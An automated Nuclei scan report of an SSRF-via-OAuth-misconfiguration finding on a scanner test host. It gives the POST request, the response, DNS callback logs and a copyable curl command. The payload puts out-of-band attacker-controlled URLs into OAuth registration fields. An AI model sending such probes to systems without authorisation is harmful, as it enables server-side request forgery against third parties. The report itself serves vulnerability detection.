SSRF due to misconfiguration in OAuth (ssrf-via-oauth-misconfig) found on honey.scanme.sh

[mkrs2404]

Details: ssrf-via-oauth-misconfig matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/connect/register

Timestamp: Tue Apr 30 19:28:33 +0530 IST 2024

Template Information

Key	Value
Name	SSRF due to misconfiguration in OAuth
Authors	kabirsuda
Tags	misconfig, oast, oauth, ssrf, intrusive
Severity	medium
Description	Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.

Request

POST /connect/register HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 395
Accept-Language: en-US,en;q=0.9
Content-Type: application/json
Accept-Encoding: gzip

{
  "application_type": "web",
  "redirect_uris": ["https://coofgv4mjeun8ktjo61gsi6kf91hazzx5.oast.me/callback"],
  "client_name": "honey.scanme.sh",
  "logo_uri": "https://coofgv4mjeun8ktjo61gm9jx4gw77ei16.oast.me/favicon.ico",
  "subject_type": "pairwise",
  "token_endpoint_auth_method": "client_secret_basic",
  "request_uris": ["https://coofgv4mjeun8ktjo61gomq58k53hsmbe.oast.me"]
}

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 679
Content-Type: application/json
Date: Tue, 30 Apr 2024 13:58:32 GMT

POST /connect/register HTTP/1.1
Host: honey.scanme.sh
Accept-Encoding: gzip
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Length: 395
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0

{
  "application_type": "web",
  "redirect_uris": ["https://coofgv4mjeun8ktjo61gsi6kf91hazzx5.oast.me/callback"],
  "client_name": "honey.scanme.sh",
  "logo_uri": "https://coofgv4mjeun8ktjo61gm9jx4gw77ei16.oast.me/favicon.ico",
  "subject_type": "pairwise",
  "token_endpoint_auth_method": "client_secret_basic",
  "request_uris": ["https://coofgv4mjeun8ktjo61gomq58k53hsmbe.oast.me"]
}

Interaction Data

dns (AAAA) Interaction from 172.253.221.132 at coofgv4mjeun8ktjo61gsi6kf91hazzx5 Interaction Request

;; opcode: QUERY, status: NOERROR, id: 61711
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;CoOFGv4mjEUn8kTjO61gsI6kf91HazZX5.OaSt.ME. IN   AAAA

Interaction Response

;; opcode: QUERY, status: NOERROR, id: 61711
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;CoOFGv4mjEUn8kTjO61gsI6kf91HazZX5.OaSt.ME. IN   AAAA

;; ANSWER SECTION:
CoOFGv4mjEUn8kTjO61gsI6kf91HazZX5.OaSt.ME.  3600    IN  A   178.128.209.14

;; AUTHORITY SECTION:
CoOFGv4mjEUn8kTjO61gsI6kf91HazZX5.OaSt.ME.  3600    IN  NS  ns1.oast.me.
CoOFGv4mjEUn8kTjO61gsI6kf91HazZX5.OaSt.ME.  3600    IN  NS  ns2.oast.me.

;; ADDITIONAL SECTION:
ns1.oast.me.    3600    IN  A   178.128.209.14
ns2.oast.me.    3600    IN  A   178.128.209.14

References:

• https://portswigger.net/research/hidden-oauth-attack-vectors

CURL command

curl -X 'POST' -d '{
  "application_type": "web",
  "redirect_uris": ["https://coofgv4mjeun8ktjo61gsi6kf91hazzx5.oast.me/callback"],
  "client_name": "honey.scanme.sh",
  "logo_uri": "https://coofgv4mjeun8ktjo61gm9jx4gw77ei16.oast.me/favicon.ico",
  "subject_type": "pairwise",
  "token_endpoint_auth_method": "client_secret_basic",
  "request_uris": ["https://coofgv4mjeun8ktjo61gomq58k53hsmbe.oast.me"]
}' -H 'Accept-Language: en-US,en;q=0.9' -H 'Content-Type: application/json' -H 'Host: honey.scanme.sh' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0' 'https://honey.scanme.sh/connect/register'

---

Generated by Nuclei v3.2.5